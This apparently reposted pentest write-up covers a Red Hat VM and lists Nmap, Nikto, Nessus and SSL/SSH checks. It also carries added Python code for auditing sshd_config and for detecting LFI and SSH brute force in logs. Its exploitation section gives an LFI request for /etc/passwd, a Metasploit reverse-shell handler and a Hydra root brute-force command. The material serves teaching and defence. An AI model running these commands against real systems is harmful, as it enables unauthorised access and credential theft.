Penetration Testing on Red Hat Linux VM: Key Takeaways and Techniques

Recently, I conducted a penetration test on a Red Hat Linux VM, applying everything I’ve learned in cybersecurity to identify and assess vulnerabilities. This project was a deep dive into real-world security testing, and I wanted to share some key takeaways:

  • Scanning & Reconnaissance – Used Nmap, Nessus, and Nikto to find open ports and outdated services.
  • Vulnerability Assessment – Discovered weak SSL/TLS settings, outdated Apache/PHP versions, and SSH misconfigurations.
  • Exploitation Attempts – Tested for LFI, RCE, and SSH brute-force vulnerabilities (some worked, some didn’t—documenting both was key!).
  • Reporting & Compliance – Mapped findings to MITRE ATT&CK and ISO 27001 and put together a detailed security report with an attack flow diagram.

You Should Know: Practical Commands & Techniques

1. Scanning & Reconnaissance

  • Nmap (Network Scanning):
    nmap -sV -A -T4 target_IP 
    nmap --script vuln target_IP 
    
  • Nikto (Web Vulnerability Scanner):
    nikto -h http://target_IP 
    
  • Nessus (Automated Vulnerability Scanning):
    Install Nessus, then start the service:
    systemctl start nessusd 
    Then open `https://localhost:8834` in a browser.

2. Vulnerability Assessment

  • Check SSL/TLS Weaknesses:
    openssl s_client -connect target_IP:443 -tls1_2 
    testssl.sh target_IP 
    
  • Check Apache & PHP Versions:
    curl -I http://target_IP | grep Server 
    php -v    # reports the PHP of the host it runs on; run it on the target itself (e.g. over an SSH session), not on the testing machine
    
  • SSH Security Check:
    ssh-audit target_IP 
    
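ssh-audit reports what the server offers over the wire; the matching configuration-side check, as an added example that is not part of the original post, is a small Python audit of sshd_config that flags the same classes of misconfiguration (root login, password authentication, permissive MaxAuthTries, weak ciphers/MACs/key exchange). The directive names are standard OpenSSH ones; the sample config, the weak-algorithm markers and the severity labels are constructed for illustration.

```python
"""Added example (not from the original post): configuration-side audit of an
OpenSSH sshd_config for the misconfiguration classes ssh-audit reports.
The sample config and severity labels are constructed for illustration."""

# Constructed sample /etc/ssh/sshd_config with several weak settings.
SAMPLE_SSHD_CONFIG = """\
# sshd_config (constructed sample)
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PermitEmptyPasswords no
MaxAuthTries 10
X11Forwarding yes
Ciphers aes256-ctr,aes128-cbc,3des-cbc
MACs hmac-sha2-256,hmac-md5,hmac-sha1
KexAlgorithms curve25519-sha256,diffie-hellman-group1-sha1
"""

# Substrings marking algorithms that ssh-audit-style checks treat as weak:
# CBC modes, 3DES/RC4/Blowfish, MD5 or SHA-1 MACs, truncated 96-bit MACs,
# and SHA-1 / 1024-bit-group Diffie-Hellman key exchange (assumed list).
WEAK_ALGORITHM_MARKERS = {
    "ciphers": ("-cbc", "3des", "arcfour", "blowfish"),
    "macs": ("md5", "hmac-sha1", "-96"),
    "kexalgorithms": ("group1-sha1", "group14-sha1", "group-exchange-sha1"),
}
SEVERITY_ORDER = {"Critical": 0, "High": 1, "Medium": 2, "Low": 3}


def parse_sshd_config(text):
    """Map lower-cased directive -> value. sshd honours the first occurrence
    of a directive, so later duplicates are ignored here as well."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        conf.setdefault(key, value)
    return conf


def audit_sshd_config(text):
    """Return a severity-sorted list of (severity, description) findings.
    Directives absent from the file fall back to OpenSSH defaults, which
    this check does not evaluate."""
    conf = parse_sshd_config(text)
    findings = []

    def flag_value(key, bad_values, severity, advice):
        value = conf.get(key)
        if value is not None and value.lower() in bad_values:
            findings.append((severity, f"{key} {value}: {advice}"))

    flag_value("permitemptypasswords", {"yes"}, "Critical", "empty passwords accepted")
    flag_value("permitrootlogin", {"yes"}, "High",
               "direct root login over SSH; set 'no' or 'prohibit-password'")
    flag_value("passwordauthentication", {"yes"}, "Medium",
               "password logins enabled, so the host is exposed to guessing; prefer keys")
    flag_value("x11forwarding", {"yes"}, "Low", "X11 forwarding enabled on a server")

    tries = conf.get("maxauthtries", "")
    if tries.isdigit() and int(tries) > 4:
        findings.append(("Medium", f"maxauthtries {tries}: many guesses per connection; lower to 3 or 4"))

    for key, markers in WEAK_ALGORITHM_MARKERS.items():
        for algo in conf.get(key, "").split(","):
            name = algo.strip().lower()
            if name and any(marker in name for marker in markers):
                findings.append(("Medium", f"{key}: weak algorithm {name} offered"))

    findings.sort(key=lambda f: SEVERITY_ORDER[f[0]])
    return findings


if __name__ == "__main__":
    for severity, description in audit_sshd_config(SAMPLE_SSHD_CONFIG):
        print(f"[{severity}] {description}")
```

Run it against a copy of the target's `/etc/ssh/sshd_config` (read the file into `audit_sshd_config`) and pair the output with ssh-audit's wire-level view: the config audit tells you which directive to change, the wire audit confirms the change took effect after `systemctl restart sshd`.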

3. Exploitation Attempts

  • Local File Inclusion (LFI):
    curl "http://target_IP/vulnerable.php?file=/etc/passwd"    # quote the URL so the shell does not treat ? as a glob
    
  • Remote Code Execution (RCE):
    msfconsole 
    use exploit/multi/handler 
    set payload linux/x86/shell/reverse_tcp 
    exploit 
    
  • SSH Brute-Force (Hydra):
    hydra -l root -P passwords.txt ssh://target_IP 
    

4. Reporting & Compliance

  • MITRE ATT&CK Mapping:
    Use ATT&CK Navigator (https://mitre-attack.github.io/attack-navigator/) 
    
  • ISO 27001 Checklist:
    Use Lynis for Linux auditing: 
    lynis audit system 
    
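The LFI probes and SSH brute-force attempts from section 3 leave distinctive traces in the Apache access log and the SSH auth log (`/var/log/secure` on Red Hat), and the section 4 report wants each finding tagged with its ATT&CK technique. As an added example that is not part of the original post, the Python below runs simple detection logic over constructed sample log lines and tags each hit with the technique ID it maps to: T1190 (Exploit Public-Facing Application) for the LFI probes and T1110.001 (Brute Force: Password Guessing) for the SSH failures. The log formats are the standard Apache combined and OpenSSH syslog formats; the sample lines, IP addresses and failure threshold are assumptions.

```python
"""Added example (not from the original post): detect the LFI probes and SSH
password-guessing from section 3 in sample logs and tag each finding with the
MITRE ATT&CK technique it maps to for the section 4 report. The log lines
below are constructed for illustration."""
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Constructed Apache combined-format access log.
APACHE_ACCESS_LOG = """\
10.0.0.5 - - [10/Mar/2025:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2025:12:00:05 +0000] "GET /vulnerable.php?file=/etc/passwd HTTP/1.1" 200 1893 "-" "curl/8.0.1"
10.0.0.9 - - [10/Mar/2025:12:00:07 +0000] "GET /vulnerable.php?file=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 403 211 "-" "curl/8.0.1"
10.0.0.5 - - [10/Mar/2025:12:00:09 +0000] "GET /about.php?file=team HTTP/1.1" 200 640 "-" "Mozilla/5.0"
"""

# Constructed OpenSSH syslog lines (/var/log/secure on Red Hat).
AUTH_LOG = """\
Mar 10 12:01:01 rhel-vm sshd[2211]: Failed password for root from 10.0.0.9 port 51000 ssh2
Mar 10 12:01:02 rhel-vm sshd[2213]: Failed password for root from 10.0.0.9 port 51001 ssh2
Mar 10 12:01:02 rhel-vm sshd[2215]: Failed password for root from 10.0.0.9 port 51002 ssh2
Mar 10 12:01:03 rhel-vm sshd[2217]: Failed password for root from 10.0.0.9 port 51003 ssh2
Mar 10 12:01:04 rhel-vm sshd[2219]: Failed password for root from 10.0.0.9 port 51004 ssh2
Mar 10 12:01:05 rhel-vm sshd[2220]: Failed password for deploy from 10.0.0.5 port 50221 ssh2
Mar 10 12:01:08 rhel-vm sshd[2221]: Accepted publickey for deploy from 10.0.0.5 port 50222 ssh2
Mar 10 12:01:09 rhel-vm sshd[2222]: Failed password for invalid user admin from 10.0.0.9 port 51006 ssh2
"""

# ATT&CK technique IDs used to tag findings in the report.
ATTACK_LFI = "T1190"        # Exploit Public-Facing Application
ATTACK_BRUTE = "T1110.001"  # Brute Force: Password Guessing

APACHE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Traversal sequences and classic LFI targets. The path is URL-decoded once
# before matching, so %2F-encoded traversal is caught; the encoded form is kept
# in the pattern so a double-encoded attempt still matches after one decode.
LFI_RE = re.compile(r'(\.\./|%2e%2e%2f|/etc/(passwd|shadow)|/proc/self/environ)', re.IGNORECASE)
FAILED_RE = re.compile(r'sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)')


def find_lfi_attempts(log_text):
    """Return one finding per access-log request whose path looks like an LFI probe."""
    hits = []
    for line in log_text.splitlines():
        m = APACHE_RE.match(line)
        if not m:
            continue
        path = unquote(m.group("path"))
        if LFI_RE.search(path):
            hits.append({"ip": m.group("ip"), "path": path,
                         "status": int(m.group("status")), "attack": ATTACK_LFI})
    return hits


def find_ssh_bruteforce(log_text, threshold=5):
    """Return {ip: {...}} for source IPs with at least `threshold` failed password logins."""
    failures = Counter()
    users = defaultdict(set)
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failures[m.group("ip")] += 1
            users[m.group("ip")].add(m.group("user"))
    return {ip: {"failures": n, "users": sorted(users[ip]), "attack": ATTACK_BRUTE}
            for ip, n in failures.items() if n >= threshold}


if __name__ == "__main__":
    for hit in find_lfi_attempts(APACHE_ACCESS_LOG):
        print(f"[{hit['attack']}] LFI probe from {hit['ip']}: {hit['path']} -> HTTP {hit['status']}")
    for ip, info in find_ssh_bruteforce(AUTH_LOG).items():
        print(f"[{info['attack']}] {ip}: {info['failures']} failed logins, users {info['users']}")
```

Note that the first LFI probe returned HTTP 200, which is the evidence the report needs to rank that finding Critical rather than merely noting an attempt; the 403 on the second shows where a control already held. Feeding the real logs into these two functions also gives you the "failed attempts" the post recommends documenting, with the source IP and technique ID ready for the ATT&CK Navigator layer.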

What Undercode Says

Penetration testing is not just about exploiting vulnerabilities but understanding risk management. Always document failed attempts—they reveal security gaps. Automation (Nessus, Nmap) speeds up recon, but manual testing (LFI/RCE checks) is irreplaceable. Compliance frameworks (MITRE, ISO 27001) help structure findings professionally.

Expected Output:

  • A detailed penetration test report with:
    – Vulnerability rankings (Critical/High/Medium).
    – Remediation steps (e.g., update Apache, disable weak SSH ciphers).
    – Attack flow diagrams for visual context.

Reported By: Saad Khan – Hackers Feeds